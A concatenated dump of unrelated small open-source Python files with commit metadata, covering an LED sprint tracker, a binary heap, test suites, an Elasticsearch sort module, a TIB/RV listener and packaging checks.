7 2 [(0, 305), (1, 31)]
7 3 [(0, 275), (1, 38), (2, 2)]
8 1 [(0, 671), (1, 43)]
8 2 [(0, 831), (1, 53)]
8 3 [(0, 741), (1, 71), (2, 4)]
8 4 [(-2, 1), (-1, 1), (0, 778), (1, 64), (2, 6)]
9 1 [(0, 1799), (1, 71)]
9 2 [(0, 2223), (1, 87)]
9 3 [(0, 2011), (1, 127), (2, 6), (3, 1)]
9 4 [(-2, 2), (-1, 3), (0, 2061), (1, 122), (2, 12)]
10 1 [(0, 4779), (1, 116)]
10 2 [(0, 5905), (1, 147)]
10 3 [(0, 5374), (1, 220), (2, 11), (3, 2)]
10 4 [(-2, 4), (-1, 10), (0, 5519), (1, 228), (2, 22), (3, 2)]
10 5 [(-2, 6), (-1, 7), (0, 5419), (1, 236), (2, 28)]
'''
# For Python2 compatibility
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
__metaclass__ = type
from .rankmatrices import RankMatrices
from .cdr_matrices import b_empty
from .cdr_matrices import b1
from .cdr_matrices import b2
from .cdr_matrices import rules_factory
from .cdr_matrices import rule_matrices_from_rules
from .cdr_matrices import cdr_print
# Start as clone of basic_matrices.
def candidate_11(word):
yield b1 + word
def candidate_12(word):
yield b1 + word
def candidate_2(word):
yield b2 + word
candidate_rules = rules_factory(candidate_11, candidate_12, candidate_2)
candidate_rule_matrices = rule_matrices_from_rules(candidate_rules)
candidate_matrices = RankMatrices(matrices=candidate_rule_matrices)
if __name__ == '__main__':
import doctest
print(doctest.testmod())
| mit | Python | |
51b72ace0e0041199c596074718c2f8b22f5de71 | Create stripmanager.py | freedom27/jira_sprint_ledstrip_tracker | stripmanager.py | stripmanager.py | import time
from neopixel import *
import datamanager
# LED strip configuration:
LED_COUNT = 60 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 5 # DMA channel to use for generating signal (try 5)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS)
strip.begin()
def fill_strip_percentage(perc):
limit = int(60*perc)
for i in range(limit):
strip.setPixelColor(i, 0)
for i in range(limit):
delta = float(255)*(float(i)/60.0)
strip.setPixelColorRGB(i, int(delta), int(255-delta), 0)
strip.show()
time.sleep(0.2)
if __name__ == '__main__':
old_perc = 0.0
while True:
progress = datamanager.get_sprint_progress()
perc = float(progress)/100.0
if not old_perc == perc:
old_perc = perc
fill_strip_percentage(perc)
time.sleep(600)
| mit | Python | |
a19aff3173a85ca8b0035873c3a6315d3dbedba4 | Create main.py | Python-IoT/Smart-IoT-Planting-System,Python-IoT/Smart-IoT-Planting-System | gateway/src/main.py | gateway/src/main.py | #!/usr/bin/env python
#Gateway main script.
#Communicate with end devices via LoRa.
#Communicate with server via MQTT(hbmqtt) and HTTP POST.
#Save data in the sqlite database.
#Parse JSON from MQTT and LoRa protocol.
| mit | Python | |
754a717c8abc0f6b2683071684420240ff0aef17 | add heap | haandol/algorithm_in_python | ds/heap.py | ds/heap.py | class BinHeap:
def __init__(self):
self.heap_list = [0]
self.size = 0
def siftup(self, i):
while i // 2 > 0:
if self.heap_list[i] < self.heap_list[i//2]:
self.heap_list[i//2], self.heap_list[i] = self.heap_list[i], self.heap_list[i//2]
i = i // 2
def insert(self, k):
self.heap_list.append(k)
self.size += 1
self.siftup(self.size)
def siftdown(self, i):
while (i*2) <= self.size:
mc = self.min_child(i)
if self.heap_list[i] > self.heap_list[mc]:
self.heap_list[i], self.heap_list[mc] = self.heap_list[mc], self.heap_list[i]
i = mc
def min_child(self, i):
if i*2+1 > self.size:
return i * 2
else:
if self.heap_list[i*2] < self.heap_list[i*2+1]:
return i*2
else:
return i*2+1
def pop(self):
v = self.heap_list[1]
self.heap_list[1] = self.heap_list[self.size]
self.size -= 1
self.heap_list.pop()
self.siftdown(1)
return v
def build_heap(self, L):
i = len(L) // 2
self.size = len(L)
self.heap_list = [0] + L
while i > 0:
self.siftdown(i)
i -= 1
if '__main__' == __name__:
heap = BinHeap()
L = [9, 6, 5, 3, 2]
heap.build_heap(L)
| mit | Python | |
58c604a8574ade75aecbd80314004a9539e80c84 | Add ?wv command for encouraging action | smarkets/hal | plugins/volunteers.py | plugins/volunteers.py | __commands__ = '''
?wv [name] - congratulates people on their public sprited gesture
'''
def plugin(bot):
bot.hear(r'^\?wv$', "Well volunteered!")
bot.hear(r'^\?wv\s(.+)$', lambda response: "Well volunteered %s!" % response.match.group(1).strip())
| mit | Python | |
2d1fd9c81ca9f17270ecef6505830cb798632091 | initialize graph test file. | constanthatz/data-structures | test_simple_graph.py | test_simple_graph.py | #!/usr/bin/env python
from __future__ import print_function
from __future__ import unicode_literals
def test_init(self):
return
def test_nodes():
return nodes
def test_edges():
return edges
def test_add_node(value):
return
def test_add_edge(value1, value2):
return
def test_del_node(value):
return
def test_has_node(value):
return
def test_neighbors(value):
return neighbors
def test_adjecent(value, value2):
return condition
| mit | Python | |
0f782c2ade2f58641688742d6fc1030f6259df40 | Add code to JSONize the dataset | bassosimone/nadia | nadia/jsonize.py | nadia/jsonize.py | # nadia/jsonize.py
#
# Copyright (c) 2011 Simone Basso <bassosimone@gmail.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
#
# When the dataset is ready, we export each line with JSON. The export
# tries to group fields in a CKAN-friendly way so that, ideally, one can
# load the json and pass it directly to ckan-client.
#
import sys
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
sys.stderr.write("nadia: with Python < 2.6 please install simplejson")
sys.exit(1)
if __name__ == "__main__":
sys.path.insert(0, ".")
from nadia.excel import open_sheet
from nadia.excel import row_values
from nadia.data import data_section
from nadia.yaxis import y_axis
from nadia.finalize import remove_empty_lines
from nadia.finalize import global_data
from nadia.finalize import global_const
from nadia.django import slugify
class CKANPackage(object):
def __init__(self):
self.author = u""
self.name = u""
self.url = u""
self.notes = [] # XXX
self.tags = []
self.extras = {}
self.title = u""
def jsonize(data, fp, indent=None):
headers = data[0]
body = data[1:]
for i in range(1, len(body)):
package = CKANPackage()
row = body[i]
#
# The algorithm here matches loosely the one that has been
# implemented in <ckanload-italy-nexa>.
#
for j in range(0, len(row)):
cell = row[j]
header = headers[j]
if (header == "datasource" or header == "istituzione" or
header == "author"):
package.author = cell
continue
if header == "name":
package.name = cell
continue
if header == "url":
package.url = cell
continue
if (header == "tipologia di dati" or
header == "diritti sul database"):
package.notes.append(cell)
continue
if header == "title":
package.title = cell
continue
if header == "category":
package.tags.append(cell.lower().replace(" ", "-"))
continue
package.extras[header] = cell
# XXX
package.notes = "\n\n".join(package.notes)
#
# As suggested by steko, the machine readable name must
# be prepended with a slugified version of the name of the
# dataset author.
# While on that, make sure the author name is not all-
# uppercase because that looks ugly.
#
package.author = package.author.lower()
name = slugify(package.author)
if not package.name.startswith(name):
package.name = name + "_" + package.name
#
# AFAIK vars() here will work as long as all the variables of
# `package` have been initialized using __init__(). This is
# what the code above already does. Nonetheless I whish to add
# this comment for future robusteness of the code.
#
octets = json.dumps(vars(package), indent=indent)
fp.write(octets)
fp.write("\n")
if __name__ == "__main__":
sheet = open_sheet("test/sample1.xls")
data = data_section(sheet, "C3:R6", "C7:R24")
y_axis(sheet, "B7:B24", data)
data = remove_empty_lines(data)
global_data(data, sheet, "author", "A10")
global_data(data, sheet, "url", "A11")
global_data(data, sheet, "mission", "A12")
global_const(data, "category", "geodati")
jsonize(data, sys.stdout, 4)
| isc | Python | |
87eab562e847d7cdde7867c41453b10add376fba | Add test script | ikegami-yukino/madoka-python,ikegami-yukino/madoka-python | test_madoka.py | test_madoka.py | # -*- coding: utf-8 -*-
from nose.tools import eq_, ok_
import madoka
import os
class Test_madoka(object):
def test_inc(self):
sketch = madoka.Sketch()
sketch.inc('mami', 3)
eq_(1, sketch.get('mami', 3))
sketch.inc('mami', 3)
eq_(2, sketch.get('mami', 3))
def test_add(self):
sketch = madoka.Sketch()
sketch.add('mami', 3, 2)
eq_(2, sketch.get('mami', 3))
sketch.add('mami', 3, 8)
eq_(10, sketch.get('mami', 3))
def test_set(self):
sketch = madoka.Sketch()
sketch.set('mami', 3, 14)
eq_(14, sketch.get('mami', 3))
def test_clear(self):
sketch = madoka.Sketch()
sketch.set('mami', 3, 14)
sketch.clear()
eq_(0, sketch.get('mami', 3))
def test_create(self):
sketch = madoka.Sketch()
sketch.create(max_value=4)
sketch.set('mami', 3, 100)
eq_(15, sketch.get('mami', 3))
def test_copy(self):
sketch = madoka.Sketch()
sketch.set('mami', 3, 14)
new_sketch = madoka.Sketch()
new_sketch.copy(sketch)
eq_(14, new_sketch.get('mami', 3))
def test_merge(self):
sketch = madoka.Sketch()
sketch.set('mami', 3, 14)
new_sketch = madoka.Sketch()
new_sketch.set('mami', 3, 14)
new_sketch.merge(sketch)
eq_(28, new_sketch.get('mami', 3))
def test_filter(self):
sketch = madoka.Sketch()
sketch.set('mami', 3, 3)
sketch.filter(lambda x: x**2)
eq_(9, sketch.get('mami', 3))
def test_inner_product(self):
sketch = madoka.Sketch()
sketch.set('mami', 3, 2)
sketch.set('homura', 3, 1)
sketch.set('kyouko', 3, 2)
sketch.set('sayaka', 3, 2)
new_sketch = madoka.Sketch()
new_sketch.set('mami', 3, 2)
new_sketch.set('kyouko', 3, 3)
new_sketch.set('sayaka', 3, 10)
eq_(30, new_sketch.inner_product(sketch))
def test_save_and_load(self):
try:
filename = 'test.madoka'
sketch = madoka.Sketch()
sketch.set('mami', 3, 14)
sketch.save(filename)
ok_(os.path.exists(filename))
sketch = madoka.Sketch()
sketch.load(filename)
eq_(14, sketch.get('mami', 3))
finally:
os.remove(filename)
| bsd-3-clause | Python | |
100c2bb05d002c5b07e0d6ae4a242346e1362c2b | Create condition.py | gmambro/colino | colino/condition.py | colino/condition.py | from __future__ import (absolute_import, division,
print_function, unicode_literals)
class Condition(object):
def __init__(self, condition_model):
# used for holding objects like compiled reges
self.init_context = {}
# variables referenced by condition
self.variables = set()
# the condition python code
self.code = self.compile(condition_model)
def compile(self, condition_model):
"""create a valid python expression from a condition model"""
# TODO recursice descent into model, one method for class
pass
| apache-2.0 | Python | |
cf6172353ad5f73185b8de0d60510a0713aa9895 | Transform omorfi tagged text into finnpos format. | mpsilfve/FinnPos,mpsilfve/FinnPos,mpsilfve/FinnPos,mpsilfve/FinnPos | bin/omorfi2finnpos.py | bin/omorfi2finnpos.py | from sys import stdin, argv, stderr
from re import findall
def get_lemma(string, convert_type):
if convert_type == 'ftb':
word_id_strs = findall('\[WORD_ID=[^\]]*\]', string)
lemma_parts = [ word_id_str[9:][:-1] for word_id_str in word_id_strs ]
return '#'.join(lemma_parts)
else:
return string[:string.find('\t')]
def get_label(string, convert_type):
if convert_type == 'ftb':
# Remove everything up to the start of the last lemma.
string = string[string.rfind('[WORD_ID=') + len('[WORD_ID='):]
# Remove the last lemma.
label = string[string.find(']') + 1:]
# Add sub label separators.
label = label.replace('][',']|[')
sub_labels = label.split('|')
sub_labels = filter(lambda x: x.find("STYLE=") == -1, sub_labels)
sub_labels = filter(lambda x: x.find("DRV=") == -1, sub_labels)
label = '|'.join(sub_labels)
return label
else:
return string[string.find('\t'):]
def convert(ifile, convert_type):
wf = ''
labels = ''
lemmas = []
for line in ifile:
line = line.strip()
if line == '' and wf != '':
lemmas = list(set(lemmas))
print('%s\t%s\t%s\t%s\t%s' % (wf, '_', '_', labels, str(lemmas)))
wf, labels, lemmas = '', '', []
elif line == '':
continue
elif (convert_type == 'ftb' and
line == 'OMORFI_VERSION_≥_14_©_GNU_GPL_V3'):
print('')
entry = ''
elif convert_type == 'tdt' and line.find('<END>') != -1:
print('')
entry = ''
else:
if convert_type == 'ftb':
wf, analysis = line.split('\t')
if analysis == '+?':
labels = '_'
else:
label = get_label(analysis, convert_type)
lemma = get_lemma(analysis, convert_type)
if labels != '':
labels += ' '
labels += label
lemmas.append((label, lemma))
else:
wf, lemma, label = line.split('\t')
lemma = lemma.replace('|','')
if label == '+?':
labels = '_'
else:
if labels != '':
labels += ' '
labels += label
lemmas.append((label, lemma))
if __name__=='__main__':
convert_type = 'ftb'
if len(argv) == 2:
convert_type = argv[1]
elif len(argv) != 1:
stderr.write('USE: cat indata | %s (ftb|tdt) > outdata\n' % argv[0])
exit(1)
if not convert_type in ['ftb','tdt']:
stderr.write('Unknown conversion type %s. Should be ftb or tdt.' %
convert_type)
exit(1)
convert(stdin, convert_type)
| apache-2.0 | Python | |
723a7ef13c34bf6e292377db9849753d34b4d0d1 | add new helper to display completion on learner dashboard | appsembler/edx-platform,appsembler/edx-platform,appsembler/edx-platform,appsembler/edx-platform | openedx/core/djangoapps/appsembler/html_certificates/helpers.py | openedx/core/djangoapps/appsembler/html_certificates/helpers.py | """
Appsembler Helpers to improve course info in learner dashboard.
We should remove this after Maple, since all the info is in the new course_home_api.
"""
import beeline
from xmodule.modulestore.django import modulestore
from common.djangoapps.student.helpers import cert_info
from lms.djangoapps.course_blocks.api import get_course_blocks
@beeline.traced('html_certificates.get_course_blocks_completion_summary')
def get_course_blocks_completion_summary(course_key, user):
"""
Returns an object with the number of complete units, incomplete units, and units that contain gated content
for the given course. The complete and incomplete counts only reflect units that are able to be completed by
the given user. If a unit contains gated content, it is not counted towards the incomplete count.
The object contains fields: complete_count, incomplete_count, locked_count
"""
if not user.id:
return {}
beeline.add_context_field('username', user.username)
beeline.add_context_field('course_key', course_key)
store = modulestore()
course_usage_key = store.make_course_usage_key(course_key)
block_data = get_course_blocks(user, course_usage_key, allow_start_dates_in_future=True, include_completion=True)
complete_count, incomplete_count, locked_count = 0, 0, 0
for section_key in block_data.get_children(course_usage_key): # pylint: disable=too-many-nested-blocks
for subsection_key in block_data.get_children(section_key):
for unit_key in block_data.get_children(subsection_key):
complete = block_data.get_xblock_field(unit_key, 'complete', False)
contains_gated_content = block_data.get_xblock_field(unit_key, 'contains_gated_content', False)
if contains_gated_content:
locked_count += 1
elif complete:
complete_count += 1
else:
incomplete_count += 1
return {
'complete_count': complete_count,
'incomplete_count': incomplete_count,
'locked_count': locked_count
}
| agpl-3.0 | Python | |
898e1692ed87890cf77a7534e3c51afed112a131 | add a top-level __init__.py with imports of the main classes | pyreaclib/pyreaclib | pyreaclib/__init__.py | pyreaclib/__init__.py | """
pyreaclib is a python module that interprets the nuclear reaction rates
cataloged by the JINA ReacLib project:
https://groups.nscl.msu.edu/jina/reaclib/db/
It provides both interactive access to the rates, for use in Jupyter
notebooks as well as methods for writing python and Fortran nuclear
reaction networks, including the the righthand side and Jacobian
routines.
"""
__version__ = "1.0"
from pyreaclib.networks import \
RateCollection, \
Composition, \
Explorer, \
PythonNetwork, \
BaseFortranNetwork, \
BoxLibNetwork, \
SundialsNetwork
| bsd-3-clause | Python | |
a7a20eacc94f1bca2baf5c37632f116e34f2f079 | Create data_cleansed.py | searchs/bigdatabox,searchs/bigdatabox | data_cleansed.py | data_cleansed.py | # Data Cleansing
import pandas as pd
df = pd.DataFrame()
# 1. Explore data: df.head(), df.tail(), df.info(), df.describe()
# Check NULL values totals: df.isna().sum()
# 2. Drop NaValues: df.dropna(inplace=True)
# 3. Deal with Duplicates: df.duplicated().value_counts()
''' A general rule of thumb is to ignore the duplicate values if they are less
than 0.5%. This is because, if the proportion is very low, duplicate values can
also be because of chance. If it is higher than 0.5%, you can check if the
consecutive values are duplicate. If the consecutive values are duplicate, you can
drop them.'''
df.loc[(df['col_1'].diff() != 0) |
(df['col_2'].diff() != 0) |
(df['col_3'].diff() != 0) |
(df['col_4'].diff() != 0)
]
# 4. Row count: df.shape[0]
# 5. Deal with outliers: df['returns'] = df['close'].pct_change()
| mit | Python | |
d90bb9ddfbac20fa9ae7d7ecf37064cb8a86b26e | add algorithm which choose the node with largest degree to query | ryaninhust/sampling | degree_largest.py | degree_largest.py | from random import sample,random,choice
from core import Algorithm
from egraphs import FBEgoGraph
class DegreeLargest(Algorithm):
def update_graph(self, start_node, new_node):
g = self.sampled_graph
start_id = g.vs['name'].index(start_node)
if new_node['name'] not in g.vs['name']:
g.add_vertex(**new_node)
index = g.vs['name'].index(new_node['name'])
g.add_edge(start_id,index)
else:
index = g.vs['name'].index(new_node['name'])
if g.get_eid(start_id, index, directed=False, error=False) == -1:
g.add_edge(start_id,index)
def degree_largest(self):
full_degree = self.sampled_graph.vs['degree']
sample_degree = self.sampled_graph.degree()
difference = [x1 - x2 for (x1, x2) in zip(full_degree, sample_degree)]
return difference.index(max(difference))
def run(self,k):
n_attribute = len(self.sampled_graph.vertex_attributes())-2
i = 0
while i < k:
query_node = self.sampled_graph.vs['name'][self.degree_largest()]
query_result = self.egraph.query_node(query_node,n_attribute)
self.update_graph(query_node,query_result)
i += 1
if __name__ == "__main__":
fbego_graph = FBEgoGraph('data/egofb.txt')
fuck_rj = RandomJump(fbego_graph)
print fuck_rj.validate() | mit | Python | |
7b4f3784f3c27e861b2b741fe2a02c82a97e8fb9 | change storage test file name | DvA-leopold/CrAB,DvA-leopold/CrAB | blockchain_storage/tests.py | blockchain_storage/tests.py | import hashlib
import leveldb
database = leveldb.LevelDB('/home/operator/PycharmProjects/CrAB/db', create_if_missing=False)
hash = hashlib.sha256('data'.encode())
print('hash: ', hash.digest())
database.Put(hashlib.sha256('data'.encode()).digest(), 'something'.encode())
print(database.Get(hashlib.sha256('data'.encode()).digest()))
| mpl-2.0 | Python | |
40ad674ae170347ed69b19434241438bb09e473d | Define decorator for requiring login | ueg1990/customer-info,ueg1990/customer-info | app/decorators.py | app/decorators.py | from functools import wraps
from flask import redirect, session, url_for
def login_required(f):
@wraps(f)
def wrapper(*args, **kwargs):
if session.get('logged_in', False):
return f(*args, **kwargs)
return redirect(url_for('public.login'))
return wrapper
| apache-2.0 | Python | |
855a8550c6bd6e1a16700610e07f9192f9907125 | move sort to its own module | Fiedzia/pyes,HackLinux/pyes,mavarick/pyes,HackLinux/pyes,aparo/pyes,haiwen/pyes,HackLinux/pyes,mavarick/pyes,aparo/pyes,haiwen/pyes,haiwen/pyes,jayzeng/pyes,mavarick/pyes,Fiedzia/pyes,jayzeng/pyes,Fiedzia/pyes,jayzeng/pyes,aparo/pyes | pyes/sort.py | pyes/sort.py | from .exceptions import InvalidSortOrder
from .utils import EqualityComparableUsingAttributeDictionary
class SortOrder(EqualityComparableUsingAttributeDictionary):
"""
Defines sort order
"""
MODE_MIN = 'min'
MODE_MAX = 'max'
MODE_SUM = 'sum' # not available for geo sorting
MODE_AVG = 'avg'
MODES = (MODE_MIN, MODE_MAX, MODE_SUM, MODE_AVG)
def __init__(self, field=None, order=None, mode=None, nested_path=None,
nested_filter=None, missing=None, ignore_unmapped=None):
self.field = field
self.mode = mode
self.order = order
self.nested_path = nested_path
self.nested_filter = nested_filter
self.missing = missing
self.ignore_unmapped = ignore_unmapped
def serialize_order_params(self):
res = {}
if self.order:
res['order'] = self.order
if self.mode:
res['mode'] = self.mode
if self.nested_path:
res['nested_path'] = self.nested_path
if self.nested_filter:
res['nested_filter'] = self.nested_filter.serialize()
if self.missing:
res['missing'] = self.missing
if self.ignore_unmapped is not None:
res['ignore_unmapped'] = self.ignore_unmapped
return res
def serialize(self):
"""Serialize the search to a structure as passed for a search body."""
if not self.field:
raise InvalidSortOrder('sort order must contain field name')
return {self.field: self.serialize_order_params()}
def __repr__(self):
return str(self.serialize())
class GeoSortOrder(SortOrder):
def __init__(self, lat=None, lon=None, geohash=None, unit=None,
**kwargs):
super(GeoSortOrder, self).__init__(**kwargs)
self.lat = lat
self.lon = lon
self.geohash = geohash
self.unit = unit
def serialize_order_params(self):
res = super(GeoSortOrder, self).serialize_order_params()
if self.geohash:
res[self.field] = self.geohash
elif self.lat is not None and self.lon is not None:
res[self.field] = [self.lat, self.lon]
else:
raise InvalidSortOrder('Either geohash or lat and lon must be set')
if self.unit:
res['unit'] = self.unit
return res
def serialize(self):
res = {
'_geo_distance': self.serialize_order_params()
}
return res
class ScriptSortOrder(SortOrder):
def __init__(self, script, type=None, params=None, **kwargs):
super(GeoSortOrder, self).__init__(**kwargs)
self.script = script
self.type = type
self.params = params
def serialize(self):
pass
class SortFactory(EqualityComparableUsingAttributeDictionary):
"""
Container for SortOrder objects
"""
def __init__(self):
self.sort_orders = []
def serialize(self):
"""Serialize the search to a structure as passed for a search body."""
res = []
for _sort in self.sort_orders:
res.append(_sort.serialize())
return res
def __repr__(self):
return str(self.serialize())
def add(self, sort_order):
"""Add sort order"""
self.sort_orders.append(sort_order)
def reset(self):
"""Reset sort orders"""
self.sort_orders = []
| bsd-3-clause | Python | |
f608e18aa9fa2d13ce5a08f63ab44b942678ff5d | convert avg_face_maker from ipynb to .py and commit | andrewjtimmons/selfieexpression | avg_face_maker.py | avg_face_maker.py | """Create an average face from a list of faces"""
import numpy as np
import cv2
import sqlite3
import json
conn = sqlite3.connect("face.db")
c = conn.cursor()
faces_data = c.execute("SELECT * FROM (SELECT * FROM faces) as t1 inner join (select rowid, instagram_id from images) as t2 on t1.image_table_id = t2.rowid").fetchall()
ids_and_rois = [(x[10], x[2]) for x in faces_data]
cropped_faces = np.zeros((640,640))
for ig_id, face_roi in ids_and_rois:
img = cv2.imread('grayscale_images/'+ig_id+".jpg",0)
face_roi = json.loads(face_roi)
if img is not None:
cropped_img = img[face_roi[1]:face_roi[1]+face_roi[3], face_roi[0]:face_roi[0]+face_roi[2]]
resized_image = cv2.resize(cropped_img, (640, 640))
cropped_faces += resized_image
avg_face = cropped_faces/len(ids_and_rois)
avg_face = avg_face.astype(np.uint8)
cv2.imshow('img',avg_face)
cv2.waitKey(0)
cv2.destroyAllWindows()
cv2.imwrite("avg_face_from_numpy_large"+".jpg", avg_face) | mit | Python | |
15dca96debdc04d18ef69e457dc0c41e5288d99b | create fields.py so you don't have to specify trix fields in the admin | istrategylabs/django-trix,istrategylabs/django-trix,istrategylabs/django-trix | trix/fields.py | trix/fields.py | from django.db import models
from trix.widgets import TrixEditor
class TrixField(models.TextField):
def formfield(self, **kwargs):
kwargs.update({'widget': TrixEditor})
return super(TrixField, self).formfield(**kwargs)
| mit | Python | |
2572feea64ee5e4556763132d0663fe4412fe369 | Add fixtures to test_journal.py and add test for write_entry method. | bm5w/learning-journal,bm5w/learning-journal | test_journal.py | test_journal.py | # -*- coding: utf-8 -*-
from contextlib import closing
from pyramid import testing
import pytest
from journal import connect_db
from journal import DB_SCHEMA
TEST_DSN = 'dbname=test_learning_journal user=mark'
def init_db(settings):
with closing(connect_db(settings)) as db:
db.cursor().execute(DB_SCHEMA)
db.commit()
def clear_db(settings):
with closing(connect_db(settings)) as db:
db.cursor().execute("DROP TABLE entries")
db.commit()
def clear_entries(settings):
with closing(connect_db(settings)) as db:
db.cursor().execute("DELETE FROM entries")
db.commit()
def run_query(db, query, params=(), get_results=True):
cursor = db.cursor()
cursor.execute(query, params)
db.commit()
results = None
if get_results:
results = cursor.fetchall()
return results
def test_write_entry(req_context):
from journal import write_entry
fields = ('title', 'text')
expected = ('Test Title', 'Test Text')
req_context.params = dict(zip(fields, expected))
# assert that there are no entries when we start
rows = run_query(req_context.db, "SELECT * FROM entries")
assert len(rows) == 0
result = write_entry(req_context)
# manually commit so we can see the entry on query
req_context.db.commit()
rows = run_query(req_context.db, "SELECT title, text FROM entries")
assert len(rows) == 1
actual = rows[0]
for idx, val in enumerate(expected):
assert val == actual[idx]
@pytest.fixture(scope='session')
def db(request):
"""set up and tear down a database"""
settings = {'db': TEST_DSN}
init_db(settings)
def cleanup():
clear_db(settings)
request.addfinalizer(cleanup)
return settings
@pytest.yield_fixture(scope='function')
def req_context(db, request):
"""mock a request with a database attached"""
settings = db
req = testing.DummyRequest()
with closing(connect_db(settings)) as db:
req.db = db
req.exception = None
yield req
# after a test has run, we clear out entries for isolation
clear_entries(settings) | mit | Python | |
7ad1c83776c78e39b47792e6a8240686b04d3726 | Create main.v.py | jenerestain/smart-student | contracts/main.v.py | contracts/main.v.py | mit | Python | ||
6cffe1d30c16062e3a0414310aad89e7a04b2df6 | add handler-specific tests | keeprocking/pygelf,keeprocking/pygelf | tests/test_handler_specific.py | tests/test_handler_specific.py | from pygelf import GelfTlsHandler
import pytest
def test_tls_handler_creation():
with pytest.raises(ValueError):
GelfTlsHandler(host='127.0.0.1', port=12204, validate=True)
with pytest.raises(ValueError):
GelfTlsHandler(host='127.0.0.1', port=12204, keyfile='/dev/null')
| mit | Python | |
4121e3502f10f0ca36f696bf32e2dfe64bb19d0e | Create tibrvlisten.py | arienchen/pytibrv | examples/api/tibrvlisten.py | examples/api/tibrvlisten.py |
import sys
import getopt
from tibrv.events import *
def usage() :
print()
print("tibrvlisten.py [-service service] [-network network]")
print(" [-daemon daemon] <subject> ")
print()
sys.exit(1)
def get_params(argv):
try:
opts, args = getopt.getopt(argv, '', ['service', 'network', 'daemon'])
except getopt.GetoptError:
usage()
service = None
network = None
daemon = None
for opt, arg in opts:
if opt == '-service':
service = arg
elif opt == '-network':
network = arg
elif opt == '-daemon':
daemon = arg
else:
usage()
if len(args) != 1:
usage()
return service, network, daemon, args[0]
def my_callback(event, msg, closure):
err, send_subject = tibrvMsg_GetSendSubject(msg)
err, reply_subject = tibrvMsg_GetReplySubject(msg)
err, theString = tibrvMsg_ConvertToString(msg)
err, localTime, gmtTime = tibrvMsg_GetCurrentTimeString()
if reply_subject is not None:
print("{} ({}): subject={}, reply={}, message={}".format(
localTime, gmtTime, send_subject, reply_subject, theString));
else:
print("{} ({}): subject={}, message={}".format(
localTime, gmtTime, send_subject, theString));
# MAIN PROGRAM
def main(argv):
progname = argv[0]
service, network, daemon, subj = get_params(argv[1:])
err = tibrv_Open()
if err != TIBRV_OK:
print('{}: Failed to open TIB/RV: {}'.format('', progname, tibrvStatus_GetText(err)))
sys.exit(1)
err, tx = tibrvTransport_Create(service, network, daemon)
if err != TIBRV_OK:
print('{}: Failed to initialize transport: {}'.format('', progname, tibrvStatus_GetText(err)))
sys.exit(1)
tibrvTransport_SetDescription(tx, progname)
print("tibrvlisten: Listening to subject {}".format(subj))
err, listenID = tibrvEvent_CreateListener(TIBRV_DEFAULT_QUEUE, my_callback, tx, subj, None)
if err != TIBRV_OK:
print('{}: Error {} listening to {}'.format('', progname, tibrvStatus_GetText(err), subj))
sys.exit(2)
while tibrvQueue_Dispatch(TIBRV_DEFAULT_QUEUE) == TIBRV_OK:
pass
# In Linux/OSX
# CTRL-C will not interrupt the process
# CTRL-\ (SIGQUIT) would work
tibrv_Close()
sys.exit(0)
return
if __name__ == "__main__" :
main(sys.argv)
| bsd-3-clause | Python | |
5d8a9223905117e6b01099c318a2294e148f84b4 | Add rpmgrill check | khardix/coprcheck | coprcheck/checks.py | coprcheck/checks.py | """Checks to run on fetched builds."""
from contextlib import contextmanager
from distutils.spawn import find_executable
from functools import wraps
import fnmatch
import os
from shutil import rmtree
from subprocess import check_call
class MissingBinaryError(OSError):
"""The binary required for this check is not present in the $PATH."""
def require_bin(*binaries: [str]):
"""Decorator which checks for binaries on a system before calling
the decorated function.
Arguments:
[binary, ...]: Names of binaries to look for.
"""
def decorator(func):
@wraps(func)
def check_binaries(*args, **kwargs):
for binary in binaries:
exe = find_executable(binary)
if exe is None: raise MissingBinaryError(binary)
return func(*args, **kwargs)
return check_binaries
return decorator
def rpm_dirs(root: str):
"""Generate paths to all directories under root that contains any RPM file.
Keyword arguments:
root: The top of the searched tree
Yields:
Paths from root (included) to the directory with RPM(s).
"""
for root, _, flist in os.walk(root):
if len(fnmatch.filter(flist, '*.rpm')) > 0:
yield root
@require_bin('rpmgrill', 'rpmgrill-unpack-rpms')
def rpmgrill(project_root: str) -> None:
"""Run rpmgrill on all packages in the tree.
* Assumes following directory structure:
<project_root>/<distro>/<srpm_name>/*.rpm
The rpmgrill is run for each <distro>/<srpm_name> variant.
Keyword arguments:
project_root: Path to the stored rpms tree.
"""
@contextmanager
def unpacked(path):
"""Unpacks and then cleans files required by rpmgrill.
Keyword arguments:
path: the directory to be unpacked and tested.
Returns/yields:
path to the unpacked files.
"""
cmd = 'rpmgrill-unpack-rpms {0}'.format(path).split()
check_call(cmd)
resultdir = os.path.join(path, 'unpacked')
yield resultdir
#rmtree(resultdir)
for directory in rpm_dirs(project_root):
with unpacked(directory) as grillroot:
cmd = ['rpmgrill', grillroot]
check_call(cmd)
| agpl-3.0 | Python | |
df227e598aeda7646a6ae24384a1d9e7f9179dc2 | add vcs parsing test | Deepwalker/pundler | tests/test_vcs_requirements.py | tests/test_vcs_requirements.py | from pundle import parse_vcs_requirement
def test_parse_vcs_requirement():
assert parse_vcs_requirement('git+https://github.com/pampam/PKG.git@master#egg=PKG') == \
('pkg', 'git+https://github.com/pampam/PKG.git@master#egg=PKG', None)
| bsd-2-clause | Python | |
